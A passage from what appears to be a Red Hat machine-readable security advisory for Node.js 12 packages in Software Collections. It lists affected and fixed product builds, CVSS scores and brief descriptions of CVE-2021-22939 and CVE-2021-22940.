"7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3281" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 5.0, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Moderate" } ], "title": "nodejs: Improper handling of untypical characters in domain names" }, { "cve": "CVE-2021-22939", "cwe": { "id": "CWE-20", "name": "Improper Input Validation" }, "discovery_date": "2021-08-12T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1993039" } ], "notes": [ { "category": "description", "text": "A flaw was found in Node.js. If the Node.js HTTPS API is used incorrectly and \"undefined\" is passed for the \"rejectUnauthorized\" parameter, no error is returned, and the connections to servers with an expired certificate are accepted. The highest threat from this vulnerability is to integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: Incomplete validation of tls rejectUnauthorized parameter", "title": "Vulnerability summary" }, { "category": "other", "text": "Red Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\".", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2021-22939" }, { "category": "external", "summary": "RHBZ#1993039", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1993039" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2021-22939", "url": "https://www.cve.org/CVERecord?id=CVE-2021-22939" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2021-22939", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-22939" }, { "category": "external", "summary": "https://nodejs.org/en/blog/vulnerability/aug-2021-security-releases/", "url": "https://nodejs.org/en/blog/vulnerability/aug-2021-security-releases/" } ], "release_date": "2021-08-11T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-08-26T10:18:55+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:3281" } ], "scores": [ { "cvss_v3": { "attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 3.7, "baseSeverity": "LOW", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:L/A:N", "version": "3.1" }, "products": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Workstation-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs: Incomplete validation of tls rejectUnauthorized parameter" }, { "cve": "CVE-2021-22940", "cwe": { "id": "CWE-416", "name": "Use After Free" }, "discovery_date": "2021-08-12T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1993029" } ], "notes": [ { "category": "description", "text": "A flaw was found in Node.js, where it is vulnerable to a use-after-free attack. This flaw allows an attacker to exploit memory corruption to change process behavior. The highest threat from this vulnerability is to confidentiality and integrity.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs: Use-after-free on close http2 on stream canceling", "title": "Vulnerability summary" }, { "category": "other", "text": "This issue is a follow-up to CVE-2021-22930, as the issue was not completely resolved in the fix for CVE-2021-22930. Node.js as shipped in Red Hat Enterprise Linux 8 streams and Red Hat Software Collections is not explicitly affected by the incomplete fix because the incomplete fix was not released, but the original issue does affect these components.\n\nRed Hat Quay from version 3.4 consumes nodejs from RHEL, so security tracking is provided by the container health index on the customer portal [1]. Additionally there is no impact from this issue on Quay 3.3 and 3.2 because nodejs is only used at build time and is no longer shipped, starting with Quay 3.5 [2].\n[1] https://catalog.redhat.com/software/containers/quay/quay-rhel8/600e03aadd19c7786c43ae49?container-tabs=security\n[2] https://issues.redhat.com/browse/PROJQUAY-1409\nTherefore Quay component is marked as \"Will not fix\" with impact LOW.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7-7.7.Z:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-debuginfo-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-devel-0:12.22.5-1.el7.x86_64", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-docs-0:12.22.5-1.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.noarch", "7Server-RHSCL-3.7:rh-nodejs12-nodejs-nodemon-0:2.0.3-5.el7.src", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.ppc64le", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.s390x", "7Server-RHSCL-3.7:rh-nodejs12-npm-0:6.14.14-12.22.5.1.el7.x86_64", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.ppc64le", "7Workstation-RHSCL-3.7:rh-nodejs12-nodejs-0:12.22.5-1.el7.s390x", 